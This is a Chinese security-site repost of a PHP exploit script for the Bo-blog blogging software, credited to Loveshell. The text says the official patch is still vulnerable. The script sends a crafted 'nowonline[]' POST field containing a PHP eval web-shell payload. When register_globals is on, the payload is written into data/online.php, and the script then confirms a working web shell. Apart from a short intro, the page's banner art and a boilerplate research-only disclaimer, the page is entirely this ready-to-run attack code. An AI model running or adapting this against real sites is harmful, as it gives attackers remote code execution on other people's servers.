Exploit For Last Boblog version 's

admin 2017年4月23日08:48:25评论267 views字数 1969阅读6分33秒阅读模式
摘要

来源:Loveshell
小M找到的漏洞,被人传出去了,然后官方就不管bloger的死活要求升级………

来源:Loveshell
小M找到的漏洞,被人传出去了,然后官方就不管bloger的死活要求升级………

发布补丁还是有漏洞的
拿来YY一下
……

<?
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

$data ='nowonline[]=<?php @eval($_REQUEST[orz]);echo orz;die();?>&1468108794=orz&-1844564458=orz';
$server =$argv[1];
$sitepath =$argv[2];

if($argc!=3){
hr();
echo" Uaget: boblog.php www.defence80.com /blog//r/n";
echo" We Are ScriptKiz..../r/n";
hr();
ver();
exit;
}

echo "/r/nExploit For Bo-blog Last Version /r/n";
echo "Need Register Globals = On/r/n";
echo "/r/n";

preg_match('/X-Powered-By: php//(.+)/r/n/ie',send("",'index.php'),$php);
echo "We Got php version:/t".$php[1]."/r/n";

function send($cmd,$script)
{
global $sitepath,$server,$cookie,$count;

$path =$sitepath.$script;
$count=$count+1;
$message = "POST ".$path." HTTP/1.1/r/n";
$message .= "Accept: */*/r/n";
$message .= "Accept-Language: zh-cn/r/n";
$message .= "Referer: http://".$server.$path."/r/n";
$message .= "Content-Type: application/x-www-form-urlencoded/r/n";
$message .= "Host: ".$server."/r/n";
$message .= "User-Agent: ".$useragent."/r/n";
$message .= "Content-length: ".strlen($cmd)."/r/n";
$message .= "Connection: Keep-Alive/r/n";
$message .= "Cookie: ".$cookie."/r/n";
$message .= "/r/n";
$message .= $cmd."/r/n";

//echo $message;
$fd = @fsockopen( $server, 80 );
@fputs($fd,$message);
$resp = "<-_->";
if($fd)
{
while([email protected]($fd)) {
$resp .= @fread($fd,1024);
}
}
@fclose($fd);
$resp .="</-_->";
//echo $resp;
return $resp;
}

echo "Exploiting:/t/t............/r/n";
$response=send($data,'index.php');

$data='';
$response=send($data,'data/online.php');
if(strstr($response,'orz')) {
echo "We Got Webshell:/thttp://$server$path/data/online.php/r/n";
echo "For Fun :)";
}
else die("Exploit Failed!/r/n");

function ver(){
//版本信息,排列格式花了不少时间啊, - -|||
echo" +-------------------+ +-------------------+/r/n";
echo" +-www.loveshell.net-+ o'(-_-)'o +-- danger??? --+/r/n";
echo" +-------------------+ 啊?你说不怕火星人啊? +-------------------+/r/n";
hr();
}

function hr(){
echo" +-------------------------------------------------------------------+/r/n";
}

?>

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月23日08:48:25
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Exploit For Last Boblog version 'shttps://cn-sec.com/archives/49089.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息